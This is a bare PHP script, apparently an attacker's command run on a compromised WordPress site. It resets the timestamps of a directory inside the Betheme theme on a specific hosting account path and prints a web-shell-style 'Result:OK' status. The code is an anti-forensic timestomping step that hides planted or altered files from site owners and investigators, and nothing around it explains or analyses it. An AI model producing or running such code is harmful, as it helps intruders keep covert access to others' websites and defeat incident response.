<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(touch('/home/com4r4t4/public_html/wp-content/themes/betheme/muffin-options/_dark/', 1711417478, 1711417478)) echo "touched";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>"; die;